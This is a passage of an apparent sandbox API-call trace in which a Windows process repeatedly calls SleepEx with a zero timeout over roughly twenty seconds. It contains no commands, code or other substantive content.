(dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.546] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.571] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.596] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.676] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.703] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.708] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.722] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.761] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.797] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.797] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.800] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.817] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.843] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.874] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.911] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0282.963] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.021] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.153] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.181] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0283.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.968] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0284.988] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.055] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.056] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.076] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.176] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.177] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.190] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.213] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.223] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.259] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.292] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.402] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.447] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.454] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.526] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.576] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.578] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.578] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.579] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.579] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.584] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.586] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.620] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.691] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.729] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.752] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.784] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.801] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.821] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.836] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.844] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.848] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.860] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.864] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.872] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0285.894] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.072] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.112] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.356] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.361] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.376] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.413] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.431] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.498] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.541] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.567] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.699] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.801] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.842] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.846] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.847] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.849] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.855] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0287.880] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.727] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.750] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.753] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.764] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.795] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.852] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.867] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.868] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.894] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.934] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.937] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0289.978] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.049] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.139] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.169] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.170] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.218] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.243] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.245] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.255] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.264] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.265] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.286] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.310] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.358] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.511] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.629] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.696] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.716] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.717] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.723] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.724] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.805] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.823] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.841] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.848] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.857] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.877] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.900] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.906] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.915] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0290.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.147] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.173] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.177] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.198] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.294] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.301] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.338] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.361] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.398] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.407] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.485] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.594] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.612] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.612] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.687] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.696] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0292.697] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.231] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.249] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.267] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.310] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.337] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.389] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.418] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.419] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.420] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.420] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.421] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.422] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.432] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.463] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.497] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.714] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.753] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.756] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.759] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.763] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.765] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.788] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.801] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.839] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.914] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.939] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0295.980] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.047] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.107] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.125] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.145] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.169] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.188] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.195] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.205] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.213] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.217] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.225] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.242] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0296.264] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.269] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.291] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.295] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.312] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.362] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.430] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.466] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.536] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.719] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.747] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.748] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.761] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.762] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0297.778] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.407] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.411] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.427] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.461] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.477] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.478] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.511] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.547] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.548] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.550] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.550] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.551] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.566] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.603] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.651] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.759] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.868] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.870] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.908] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.947] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.954] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.957] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0299.985] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.087] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.111] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.197] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.278] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.300] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.362] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.370] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.387] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.404] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.420] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.438] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0300.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.358] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.372] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.398] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.437] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.508] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.550] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.564] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.602] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.466] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.484] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.542] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.559] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.568] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.645] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.775] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.809] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.844] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.901] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.914] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.914] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.915] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.981] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.986] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.989] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.994] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.044] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.154] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.200] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.274] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.312] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.333] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.334] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.345] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.379] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.386] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.400] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0305.404] 